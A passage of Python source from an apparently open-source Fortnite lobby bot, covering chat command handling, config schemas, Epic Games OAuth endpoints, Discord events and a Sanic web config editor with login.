"joinmessageenable": ["joinmessageenable", l('join_', l('message'))],
"randommessageenable": ["randommessageenable", l('join_', l('randommessage'))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
if ': ' in message.content:
return
if content.isdigit() and client.select.get(message.author.id):
try:
if int(args[0]) == 0:
await reply(message, client, l('please_enter_valid_number'))
return
exec_ = client.select[message.author.id]["exec"][int(args[0])-1]
variable = globals()
variable.update(locals())
if client.select[message.author.id].get("variable"):
variable.update(client.select[message.author.id]["variable"][int(args[0])-1])
await aexec(exec_, variable)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('please_enter_valid_number'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
if do_itemsearch:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", content, "Item")
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", content, "Item")
if result:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
bot_ready = True
first_boot = True
filename = 'device_auths.json'
web_text = ''
cache_users = {}
cache_items = {}
cache_banners = {}
client_name = {}
ignoretype = [
"Contrail",
"Glider",
"Wrap",
"Loading Screen",
"Music",
"Spray",
"Battle Bus"
]
clients = []
loadedclients = []
whitelist = []
whitelist_ = []
blacklist = []
blacklist_ = []
otherbotlist = []
storedlogs = []
format_pattern = re.compile(r"""\{(.*?)\}""")
config_tags={
"['fortnite']": [dict],
"['fortnite']['email']": [str,"can_be_multiple"],
"['fortnite']['owner']": [str,"can_be_multiple"],
"['fortnite']['platform']": [str,"select_platform"],
"['fortnite']['outfit']": [str],
"['fortnite']['outfit_style']": [str],
"['fortnite']['backpack']": [str],
"['fortnite']['backpack_style']": [str],
"['fortnite']['pickaxe']": [str],
"['fortnite']['pickaxe_style']": [str],
"['fortnite']['emote']": [str],
"['fortnite']['playlist']": [str],
"['fortnite']['banner']": [str],
"['fortnite']['banner_color']": [str],
"['fortnite']['avatar_id']": [str],
"['fortnite']['avatar_color']": [str,"can_linebreak"],
"['fortnite']['level']": [int],
"['fortnite']['tier']": [int],
"['fortnite']['xpboost']": [int],
"['fortnite']['friendxpboost']": [int],
"['fortnite']['status']": [str],
"['fortnite']['privacy']": [str,"select_privacy"],
"['fortnite']['whisper']": [bool_,"select_bool"],
"['fortnite']['partychat']": [bool_,"select_bool"],
"['fortnite']['disablewhisperperfectly']": [bool_,"select_bool"],
"['fortnite']['disablepartychatperfectly']": [bool_,"select_bool"],
"['fortnite']['ignorebot']": [bool_,"select_bool"],
"['fortnite']['joinmessage']": [str,"can_linebreak"],
"['fortnite']['randommessage']": [str,"can_be_multiple"],
"['fortnite']['joinmessageenable']": [bool_,"select_bool"],
"['fortnite']['randommessageenable']": [bool_,"select_bool"],
"['fortnite']['joinemote']": [bool_,"select_bool"],
"['fortnite']['click_invite']": [bool_,"select_bool"],
"['fortnite']['disable_voice']": [bool_,"select_bool"],
"['fortnite']['outfitmimic']": [bool_,"select_bool"],
"['fortnite']['backpackmimic']": [bool_,"select_bool"],
"['fortnite']['pickaxemimic']": [bool_,"select_bool"],
"['fortnite']['emotemimic']": [bool_,"select_bool"],
"['fortnite']['mimic-ignorebot']": [bool_,"select_bool"],
"['fortnite']['mimic-ignoreblacklist']": [bool_,"select_bool"],
"['fortnite']['outfitlock']": [bool_,"select_bool"],
"['fortnite']['backpacklock']": [bool_,"select_bool"],
"['fortnite']['pickaxelock']": [bool_,"select_bool"],
"['fortnite']['emotelock']": [bool_,"select_bool"],
"['fortnite']['acceptinvite']": [bool_,"select_bool"],
"['fortnite']['acceptfriend']": [bool_none,"select_bool_none"],
"['fortnite']['addfriend']": [bool_,"select_bool"],
"['fortnite']['invite-ownerdecline']": [bool_,"select_bool"],
"['fortnite']['inviteinterval']": [bool_,"select_bool"],
"['fortnite']['interval']": [int],
"['fortnite']['waitinterval']": [int],
"['fortnite']['hide-user']": [bool_,"select_bool"],
"['fortnite']['hide-blacklist']": [bool_,"select_bool"],
"['fortnite']['show-owner']": [bool_,"select_bool"],
"['fortnite']['show-whitelist']": [bool_,"select_bool"],
"['fortnite']['show-bot']": [bool_,"select_bool"],
"['fortnite']['blacklist']": [str,"can_be_multiple"],
"['fortnite']['blacklist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['blacklist-autoblock']": [bool_,"select_bool"],
"['fortnite']['blacklist-autokick']": [bool_,"select_bool"],
"['fortnite']['blacklist-autochatban']": [bool_,"select_bool"],
"['fortnite']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['fortnite']['whitelist']": [str,"can_be_multiple"],
"['fortnite']['whitelist-allowinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignorelock']": [bool_,"select_bool"],
"['fortnite']['whitelist-ownercommand']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignoreng']": [bool_,"select_bool"],
"['fortnite']['invitelist']": [str,"can_be_multiple"],
"['fortnite']['otherbotlist']": [str,"can_be_multiple"],
"['discord']": [dict],
"['discord']['enabled']": [bool_,"select_bool"],
"['discord']['token']": [str],
"['discord']['owner']": [int,"can_be_multiple"],
"['discord']['channels']": [str,"can_be_multiple"],
"['discord']['status']": [str],
"['discord']['status_type']": [str,"select_status"],
"['discord']['discord']": [bool_,"select_bool"],
"['discord']['disablediscordperfectly']": [bool_,"select_bool"],
"['discord']['ignorebot']": [bool_,"select_bool"],
"['discord']['blacklist']": [str,"can_be_multiple"],
"['discord']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['discord']['whitelist']": [str,"can_be_multiple"],
"['discord']['whitelist-ignorelock']": [bool_,"select_bool"],
"['discord']['whitelist-ownercommand']": [bool_,"select_bool"],
"['discord']['whitelist-ignoreng']": [bool_,"select_bool"],
"['web']": [dict],
"['web']['enabled']": [bool_,"select_bool"],
"['web']['ip']": [str],
"['web']['port']": [int],
"['web']['password']": [str],
"['web']['login_required']": [bool_,"select_bool"],
"['web']['web']": [bool_,"select_bool"],
"['web']['log']": [bool_,"select_bool"],
"['replies-matchmethod']": [str,"select_matchmethod"],
"['ng-words']": [str,"can_be_multiple"],
"['ng-word-matchmethod']": [str,"select_matchmethod"],
"['ng-word-kick']": [bool_,"select_bool"],
"['ng-word-chatban']": [bool_,"select_bool"],
"['ng-word-blacklist']": [bool_,"select_bool"],
"['restart_in']": [int],
"['search_max']": [int],
"['lang']": [str,"select_lang"],
"['search-lang']": [str,"select_ben_lang"],
"['sub-search-lang']": [str,"select_ben_lang"],
"['no-logs']": [bool_,"select_bool"],
"['ingame-error']": [bool_,"select_bool"],
"['discord-log']": [bool_,"select_bool"],
"['omit-over2000']": [bool_,"select_bool"],
"['skip-if-overflow']": [bool_,"select_bool"],
"['hide-email']": [bool_,"select_bool"],
"['hide-token']": [bool_,"select_bool"],
"['hide-webhook']": [bool_,"select_bool"],
"['webhook']": [str],
"['caseinsensitive']": [bool_,"select_bool"],
"['loglevel']": [str,"select_loglevel"],
"['debug']": [bool_,"select_bool"]
}
config_tags_raw = copy.deepcopy(config_tags)
commands_tags={
"['usercommands']": [str,"can_be_multiple"],
"['true']": [str,"can_be_multiple"],
"['false']": [str,"can_be_multiple"],
"['me']": [str,"can_be_multiple"],
"['prev']": [str,"can_be_multiple"],
"['eval']": [str,"can_be_multiple"],
"['exec']": [str,"can_be_multiple"],
"['restart']": [str,"can_be_multiple"],
"['relogin']": [str,"can_be_multiple"],
"['reload']": [str,"can_be_multiple"],
"['addblacklist']": [str,"can_be_multiple"],
"['removeblacklist']": [str,"can_be_multiple"],
"['addwhitelist']": [str,"can_be_multiple"],
"['removewhitelist']": [str,"can_be_multiple"],
"['addblacklist_discord']": [str,"can_be_multiple"],
"['removeblacklist_discord']": [str,"can_be_multiple"],
"['addwhitelist_discord']": [str,"can_be_multiple"],
"['removewhitelist_discord']": [str,"can_be_multiple"],
"['addinvitelist']": [str,"can_be_multiple"],
"['removeinvitelist']": [str,"can_be_multiple"],
"['get']": [str,"can_be_multiple"],
"['friendcount']": [str,"can_be_multiple"],
"['pendingcount']": [str,"can_be_multiple"],
"['blockcount']": [str,"can_be_multiple"],
"['friendlist']": [str,"can_be_multiple"],
"['pendinglist']": [str,"can_be_multiple"],
"['blocklist']": [str,"can_be_multiple"],
"['outfitmimic']": [str,"can_be_multiple"],
"['backpackmimic']": [str,"can_be_multiple"],
"['pickaxemimic']": [str,"can_be_multiple"],
"['emotemimic']": [str,"can_be_multiple"],
"['whisper']": [str,"can_be_multiple"],
"['partychat']": [str,"can_be_multiple"],
"['discord']": [str,"can_be_multiple"],
"['web']": [str,"can_be_multiple"],
"['disablewhisperperfectly']": [str,"can_be_multiple"],
"['disablepartychatperfectly']": [str,"can_be_multiple"],
"['disablediscordperfectly']": [str,"can_be_multiple"],
"['acceptinvite']": [str,"can_be_multiple"],
"['acceptfriend']": [str,"can_be_multiple"],
"['joinmessageenable']": [str,"can_be_multiple"],
"['randommessageenable']": [str,"can_be_multiple"],
"['wait']": [str,"can_be_multiple"],
"['join']": [str,"can_be_multiple"],
"['joinid']": [str,"can_be_multiple"],
"['leave']": [str,"can_be_multiple"],
"['invite']": [str,"can_be_multiple"],
"['inviteall']": [str,"can_be_multiple"],
"['message']": [str,"can_be_multiple"],
"['partymessage']": [str,"can_be_multiple"],
"['sendall']": [str,"can_be_multiple"],
"['status']": [str,"can_be_multiple"],
"['avatar']": [str,"can_be_multiple"],
"['banner']": [str,"can_be_multiple"],
"['level']": [str,"can_be_multiple"],
"['bp']": [str,"can_be_multiple"],
"['privacy']": [str,"can_be_multiple"],
"['privacy_public']": [str,"can_be_multiple"],
"['privacy_friends_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_friends']": [str,"can_be_multiple"],
"['privacy_private_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_private']": [str,"can_be_multiple"],
"['getuser']": [str,"can_be_multiple"],
"['getfriend']": [str,"can_be_multiple"],
"['getpending']": [str,"can_be_multiple"],
"['getblock']": [str,"can_be_multiple"],
"['info']": [str,"can_be_multiple"],
"['info_party']": [str,"can_be_multiple"],
"['pending']": [str,"can_be_multiple"],
"['removepending']": [str,"can_be_multiple"],
"['addfriend']": [str,"can_be_multiple"],
"['removefriend']": [str,"can_be_multiple"],
"['removeallfriend']": [str,"can_be_multiple"],
"['remove_offline_for']": [str,"can_be_multiple"],
"['acceptpending']": [str,"can_be_multiple"],
"['declinepending']": [str,"can_be_multiple"],
"['blockfriend']": [str,"can_be_multiple"],
"['unblockfriend']": [str,"can_be_multiple"],
"['voice']": [str,"can_be_multiple"],
"['chatban']": [str,"can_be_multiple"],
"['promote']": [str,"can_be_multiple"],
"['kick']": [str,"can_be_multiple"],
"['hide']": [str,"can_be_multiple"],
"['show']": [str,"can_be_multiple"],
"['ready']": [str,"can_be_multiple"],
"['unready']": [str,"can_be_multiple"],
"['sitout']": [str,"can_be_multiple"],
"['match']": [str,"can_be_multiple"],
"['unmatch']": [str,"can_be_multiple"],
"['swap']": [str,"can_be_multiple"],
"['outfitlock']": [str,"can_be_multiple"],
"['backpacklock']": [str,"can_be_multiple"],
"['pickaxelock']": [str,"can_be_multiple"],
"['emotelock']": [str,"can_be_multiple"],
"['stop']": [str,"can_be_multiple"],
"['addeditems']": [str,"can_be_multiple"],
"['shopitems']": [str,"can_be_multiple"],
"['alloutfit']": [str,"can_be_multiple"],
"['allbackpack']": [str,"can_be_multiple"],
"['allpet']": [str,"can_be_multiple"],
"['allpickaxe']": [str,"can_be_multiple"],
"['allemote']": [str,"can_be_multiple"],
"['allemoji']": [str,"can_be_multiple"],
"['alltoy']": [str,"can_be_multiple"],
"['cid']": [str,"can_be_multiple"],
"['bid']": [str,"can_be_multiple"],
"['petcarrier']": [str,"can_be_multiple"],
"['pickaxe_id']": [str,"can_be_multiple"],
"['eid']": [str,"can_be_multiple"],
"['emoji_id']": [str,"can_be_multiple"],
"['toy_id']": [str,"can_be_multiple"],
"['id']": [str,"can_be_multiple"],
"['outfit']": [str,"can_be_multiple"],
"['backpack']": [str,"can_be_multiple"],
"['pet']": [str,"can_be_multiple"],
"['pickaxe']": [str,"can_be_multiple"],
"['emote']": [str,"can_be_multiple"],
"['emoji']": [str,"can_be_multiple"],
"['toy']": [str,"can_be_multiple"],
"['item']": [str,"can_be_multiple"],
"['set']": [str,"can_be_multiple"],
"['setvariant']": [str,"can_be_multiple"],
"['addvariant']": [str,"can_be_multiple"],
"['setstyle']": [str,"can_be_multiple"],
"['addstyle']": [str,"can_be_multiple"],
"['setenlightenment']": [str,"can_be_multiple"]
}
error_config = []
error_commands = []
outfit_keys = ("cid", "outfit", "outfitmimic", "outfitlock", "alloutfit")
backpack_keys = ("bid", "backpack", "backpackmimic", "backpacklock", "allbackpack")
pet_keys = ("petcarrier", "pet", "allpet")
pickaxe_keys = ("pickaxe_id", "pickaxe", "pickaxemimic", "pickaxelock", "allpickaxe")
emote_keys = ("eid", "emote", "emotemimic", "emotelock", "allemote")
emoji_keys = ("emoji_id", "emoji", "allemoji")
toy_keys = ("toy_id", "toy", "alltoy")
item_keys = ("id", "item")
app = Sanic(__name__)
app.secret_key = os.urandom(32)
app.static('/images', './templates/images')
env = Environment(loader=FileSystemLoader('./templates', encoding='utf8'), extensions=['jinja2.ext.do'])
auth = LoginManager()
fortnitepy_auth = fortnitepy.Auth()
launcher_token = fortnitepy_auth.ios_token
fortnite_token = fortnitepy_auth.fortnite_token
oauth_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
fortnite_token_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
exchange_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
device_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/deviceAuthorization"
exchange_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/exchange"
user_lookup_url = "https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{user_id}"
if not load_config():
sys.exit(1)
if error_config or error_commands:
bot_ready = False
for key in error_config:
config_tags[key].append("fix_required")
for key in error_commands:
commands_tags[key].append("fix_required")
search_max = data["search_max"]
if data['debug']:
logger = logging.getLogger('fortnitepy.auth')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.http')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.xmpp')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[35m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip'] = "0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if True:
send(l('bot'),f'{l("lobbybot")}: gomashio\n{l("credit")}\n{l("library")}: Terbau',cyan)
text = ""
if data['loglevel'] == 'normal':
text += f'\n{l("loglevel")}: {l("normal")}\n'
elif data['loglevel'] == 'info':
text += f'\n{l("loglevel")}: {l("info")}\n'
elif data['loglevel'] == 'debug':
text += f'\n{l("loglevel")}: {l("debug")}\n'
if data.get('debug',False) is True:
text += f'\n{l("debug")}: {l("on")}\n'
else:
text += f'\n{l("debug")}: {l("off")}\n'
text += f'\nPython {platform.python_version()}\n'
text += f'fortnitepy {fortnitepy.__version__}\n'
text += f'discord.py {discord.__version__}\n'
text += f'Sanic {sanic.__version__}\n'
send(l('bot'),text,green)
if data.get('debug',False) is True:
send(l('bot'),f'[{now()}] {l("debug_is_on")}',red)
send(l('bot'),l("booting"))
dclient = discord.Client()
dclient.owner = []
dclient.isready = False
dclient.boot_time = None
if True: #discord
@dclient.event
async def on_ready() -> None:
loop = asyncio.get_event_loop()
dclient.boot_time = time.time()
dclient_user = name(dclient.user)
send(dclient_user,f"{l('login')}: {dclient_user}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
dclient.isready = True
loop.create_task(status_loop())
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
@dclient.event
async def on_message(message: discord.Message) -> None:
await process_command(message)
async def change_status() -> None:
var = defaultdict(lambda: None)
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"boot_time": int(time.time() - dclient.boot_time)
}
)
activity = discord.Activity(name=eval_format(data['discord']['status'],var),type=data['discord']['status_type'])
await dclient.change_presence(activity=activity)
async def status_loop() -> None:
while True:
try:
await change_status()
except Exception:
send(dclient.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
select_bool = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')}
]
)
select_bool_none = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')},
{"value": "None","display_value": l('bool_none')}
]
)
select_platform = select(
[
{"value": "WIN","display_value": "Windows"},
{"value": "MAC","display_value": "Mac"},
{"value": "PSN","display_value": "PlayStation"},
{"value": "XBL","display_value": "Xbox"},
{"value": "SWT","display_value": "Switch"},
{"value": "IOS","display_value": "IOS"},
{"value": "AND","display_value": "Android"}
]
)
select_privacy = select(
[
{"value": i,"display_value": l(i)} for i in ["public","friends_allow_friends_of_friends","friends","private_allow_friends_of_friends","private"]
]
)
select_status = select(
[
{"value": i,"display_value": l(i)} for i in ["playing","listening","watching"]
]
)
select_matchmethod = select(
[
{"value": i,"display_value": l(i)} for i in ["full","contains","starts","ends"]
]
)
select_loglevel = select(
[
{"value": "normal","display_value": l('normal')},
{"value": "info","display_value": l('info')},
{"value": "debug","display_value": l('debug')}
]
)
select_lang = select(
[
{"value": re.sub(r"lang(\\|/)","",i).replace(".json",""),"display_value": re.sub(r"lang(\\|/)","",i).replace(".json","")} for i in glob("lang/*.json") if "_old.json" not in i
]
)
select_ben_lang = select(
[
{"value": i,"display_value": i} for i in ["ar","de","en","es","es-419","fr","it","ja","ko","pl","pt-BR","ru","tr","zh-CN","zh-Hant"]
]
)
converter = {
"can_be_multiple": CanBeMultiple,
"can_linebreak": CanLinebreak,
"select_bool": select_bool,
"select_bool_none": select_bool_none,
"select_platform": select_platform,
"select_privacy" :select_privacy,
"select_status": select_status,
"select_loglevel": select_loglevel,
"select_lang": select_lang,
"select_ben_lang": select_ben_lang,
"select_matchmethod": select_matchmethod,
"red": Red,
"fix_required": FixRequired
}
for key,value in config_tags.items():
for count,tag in enumerate(value):
config_tags[key][count] = converter.get(tag,tag)
for key,value in commands_tags.items():
for count,tag in enumerate(value):
commands_tags[key][count] = converter.get(tag,tag)
if True: #Web
@app.route("/favicon.ico", methods=["GET"])
async def favicon(request: Request):
return sanic.response.redirect("/images/icon.png")
if os.environ.get("FORTNITE_LOBBYBOT_STATUS") == "-1":
@app.route("/", methods=["GET"])
async def main(request: Request):
return sanic.response.html(
"<h2>Fortnite-LobbyBot<h2>"
"<p>初めに<a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README.md' target='_blank'>README</a>をお読みください</p>"
"<p>First, please read <a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README_EN.md' target='_blank'>README<a/></p>"
"<p>質問などは私(Twitter @gomashio1596 Discord gomashio#4335)か<a href='https://discord.gg/NEnka5N' target='_blank'>Discordサーバー</a>まで</p>"
"<p>For questions, Contact to me(Twitter @gomashio1596 Discord gomashio#4335) or ask in <a href='https://discord.gg/NEnka5N' target='_blank'>Discord server</a></p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>ここをクリック</a>してRemix</p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>Click here</a> to Remix</p>"
"<a href='https://discord.gg/NEnka5N' target='_blank'><img src='https://discordapp.com/api/guilds/718709023427526697/widget.png?style=banner1'></img></a>"
)
elif data["status"] == 0:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
if not corrected.get(key).get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
else:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
if request.method == "GET":
return render_template(
"main.html",
l=l,
authenticated=auth.authenticated(request),
data=data
)
elif request.method == "POST":
if auth.authenticated(request):
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
@app.route("/login", methods=["GET", "POST"])
async def login(request: Request):
if auth.authenticated(request):
return sanic.response.redirect("/")
else:
flash_messages = []
if request.method == "GET":
return render_template("login.html", l=l, flash_messages=flash_messages)
elif request.method == "POST":
if request.form.get("password","") == data["web"]["password"]:
r = sanic.response.redirect("/")
auth.login_user(request, r)
return r
else:
flash_messages.append(l('invalid_password'))
return render_template("login.html", l=l, flash_messages=flash_messages)
@app.route("/text")
@auth.login_required
async def web_text_(request: Request):
return sanic.response.json(
{
"text": web_text
}
)
@app.route("/logout")
@auth.login_required
async def logout(request: Request):
r = sanic.response.redirect("/")
auth.logout_user(request, r)
return r
@app.route("/config_editor", methods=["GET", "POST"])
@auth.login_required
async def config_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
if not corrected.get(key).get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
